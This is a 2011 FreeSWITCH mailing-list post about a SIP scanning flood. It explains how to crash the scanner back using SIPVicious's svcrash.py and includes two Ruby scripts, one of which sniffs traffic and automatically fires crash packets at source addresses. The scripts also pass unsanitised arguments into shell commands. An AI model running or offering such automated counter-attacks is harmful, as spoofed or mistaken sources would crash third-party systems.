[Freeswitch-users] SPIT attack and how to strike back

Peter P GMX Prometheus001 at gmx.net
Thu Apr 21 03:00:48 MSD 2011 

Hello all,

I would like to share this with you as you may have also been affected
by this threat.

Yesterday we received a SPIT attack to our Freeswitch servers. We had
about 50 register requests/sec. We noticed this as we saw a slight
increase in the load of the Freeswitch servers. Fortunately Freeswitch
can handle a huge amount of register requests so we had no denial of
service.

You can identify this attack by finding the following in the Register
message:
    User-Agent: friendly-scanner

How to get rid of it:
The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a
nice tool "svcrash.py" wich can send a malformed packet back to the
attacker which crashes their own Sipvicious tool. You can issue this tool by
  python svcrash.py -d <host of attacker> -p <port of attacker>
You will need port 5060 on your machine to work. But there is also a
workaround for that. svcrash.py will show how to overcome this if your
port 5060 is not available.
Download it here
http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz and
unpack it to a folder of your choice.

I wrote a small Ruby script to send the packet back to a port range, as
our attacker used some dozens of ports to send.
Here is the script (Install ruby first by "apt-get install ruby" e.g. on
Debian based systems). Put it into the sipvicious directory
kill_ports.rb:

#!/usr/bin/env ruby
host=ARGV[0]
start_port=ARGV[1].to_i
end_port=ARGV[2].to_i
start_port.upto(end_port) do |port|
  cmd="python svcrash.py -d #{host} -p #{port}"
  p cmd
  erg=`#{cmd}`
  p erg
end

You now can run it by
./kill_ports.rb <ip> <from_port> <to_port>

By using this tool we got rid of most of the SPIT messages. But after a
while they started again to attack us from different ports.

The next step is: Why not automate this by trying to identify host and
port automatically and send back the svcrash.py packet to the sender's port?

First install the pcap library
    apt-get install libpcap-dev libpcap-ruby

Then I wrote the following tool to automate this, it makes use of the
kill_ports.rb above:
strike_back.rb:

#!/usr/bin/env ruby
# I used some code from http://snippets.dzone.com/posts/show/5931
require 'pcaplet'
require 'logger'
require 'timeout'
@timeout=3600 # max runtime: 1 hour

@logfile='strike_back.log'
class AuditLogger < Logger
  def format_message(severity, timestamp, progname, msg)
    puts msg
    "#{msg}\n"
  end
end

logfile = File.open(@logfile, 'a')
LOGGER = AuditLogger.new(logfile)
LOGGER.level = Logger::INFO
search="friendly-scanner"
puts"Searching for '#{ search}' in SIP packets"
$network = Pcaplet.new('-s 1500')
$filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)
$network.add_filter($filter)
puts "Logfile: #{@logfile}"
puts "Starting capture..."
begin
  Timeout.timeout(@timeout) do # 3600 sec
    for p in $network
        header= "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")}
#{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"
        if $filter =~ p
            #puts "simple search"
            if p.udp_data.index(search)
              LOGGER.info "Kill Friendly scanner #{p.src} with Source
Port #{p.sport}"
              cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"
              erg=`#{cmd}`
              p erg
              LOGGER.info header
              LOGGER.info p.udp_data
            end
        end
    end
  end
rescue Timeout::Error
  logfile.flush
  puts "Timeout - finished."
end

There may be a better way to code this, but at least it worked. After
about 15min the number of attacks went to 0.

Disclaimer: You can damage other systems by using these tools. So be
carefull and use at your own risks. Do not use this tool for attacking
other systems!

Best regards
Peter

More information about the FreeSWITCH-users mailing list